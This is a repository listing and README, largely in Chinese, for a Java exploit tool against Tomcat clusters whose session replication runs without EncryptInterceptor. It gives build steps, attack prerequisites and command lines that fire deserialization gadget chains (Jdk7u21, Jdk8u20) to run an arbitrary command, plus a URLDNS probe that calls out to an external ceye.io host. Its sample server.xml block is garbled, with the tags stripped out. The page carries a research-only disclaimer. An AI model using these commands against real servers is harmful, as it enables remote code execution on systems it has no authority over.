https://github.com/threedr3am/tomcat-cluster-session-sync-exp

tomcat使用了自带session同步功能时，不安全的配置（没有使用EncryptInterceptor）导致存在的反序列化漏洞，通过精心构造的数据包， 可以对使用了tomcat自带session同步功能的服务器进行攻击。PS:这个不是CVE-2020-9484，9484是session持久化的洞，这个是session集群同步的洞！
https://github.com/threedr3am/tomcat-cluster-session-sync-exp

Last synced: about 2 months ago
JSON representation

tomcat使用了自带session同步功能时，不安全的配置（没有使用EncryptInterceptor）导致存在的反序列化漏洞，通过精心构造的数据包， 可以对使用了tomcat自带session同步功能的服务器进行攻击。PS:这个不是CVE-2020-9484，9484是session持久化的洞，这个是session集群同步的洞！

• Host: GitHub
• URL: https://github.com/threedr3am/tomcat-cluster-session-sync-exp
• Owner: threedr3am
• Created: 2020-05-19T05:12:53.000Z (over 4 years ago)
• Default Branch: master
• Last Pushed: 2020-05-19T05:13:19.000Z (over 4 years ago)
• Last Synced: 2024-08-05T17:27:03.489Z (5 months ago)
• Language: Java
• Homepage:
• Size: 31.3 KB
• Stars: 215
• Watchers: 3
• Forks: 38
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - threedr3am/tomcat-cluster-session-sync-exp - tomcat使用了自带session同步功能时，不安全的配置（没有使用EncryptInterceptor）导致存在的反序列化漏洞，通过精心构造的数据包， 可以对使用了tomcat自带session同步功能的服务器进行攻击。PS:这个不是CVE-2020-9484，9484是session持久化的洞，这个是session集群同步的洞！ (Java)

README

        
*工具仅用于安全研究以及内部自查，禁止使用工具发起非法攻击，造成的后果使用者负责*

### tomcat cluster sync-session 利用exp

这是一个tomcat使用了自带session同步功能时，不安全的配置（没有使用EncryptInterceptor）导致存在的反序列化漏洞，通过精心构造的数据包，

可以对使用了tomcat自带session同步功能的服务器进行攻击。

### 使用

先编译出jar包：

```

mvn clean compile assembly:assembly

```

生成jar包存在于target目录下

使用，例：

```

java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"

java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"

java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"

```

### 条件

1. tomcat启用了session同步，没有配置EncryptInterceptor

2. jdk版本低于jdk8u20、jdk7u21（不知道有没有错）

3. 同步端点可访问（一般是内网）

### tomcat-session同步配置

（conf/server.xml）：

```

    ...

    

    

        ...

        

        

            ...

            

            

            

                    

            

            

                    

                      

                      

            

                      

                        

                      

                    

            

                    

            

                    

            

                    

            

        

  

```